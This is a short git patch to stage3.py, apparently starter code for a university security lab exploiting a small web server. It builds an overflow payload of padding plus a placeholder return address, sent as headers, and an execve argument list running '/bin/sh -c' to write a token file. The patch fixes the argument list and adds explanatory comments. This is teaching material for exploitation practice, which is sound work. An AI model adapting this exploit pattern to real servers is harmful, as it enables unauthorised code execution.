From abdb8d890a039c44c99a43770de3fb7f248e66bc Mon Sep 17 00:00:00 2001 From: Adam Blank <blank@caltech.edu> Date: Mon, 19 Oct 2020 12:21:16 -0700 Subject: [PATCH] Update stage3.py --- stage3.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/stage3.py b/stage3.py index 9ceee3c..87bf1d5 100644 --- a/stage3.py +++ b/stage3.py @@ -22,7 +22,10 @@ ADDRESS = to_bytes(0xdeadbeef) USER = b"FILL ME IN" PASSWORD = b"FILL ME IN" -SCRIPT = [b"/bin/sh\x00", b"-c\x00", b"echo -n \"" + USER + b"\" | sha384sum > /hackme/tiny/tokens/" + PASSWORD + b"\x00", b"\x00"] + +# These are the arguments that make up the shell script we want to execve. +# Don't forget that there needs to be a NULL pointer as the last argument in addition to these! +SCRIPT = [b"/bin/sh\x00", b"-c\x00", b"echo -n \"" + USER + b"\" | sha384sum > /hackme/tiny/tokens/" + PASSWORD + b"\x00"] # The "exploit string" is what we send in as the headers HEADERS = PADDING + ADDRESS -- GitLab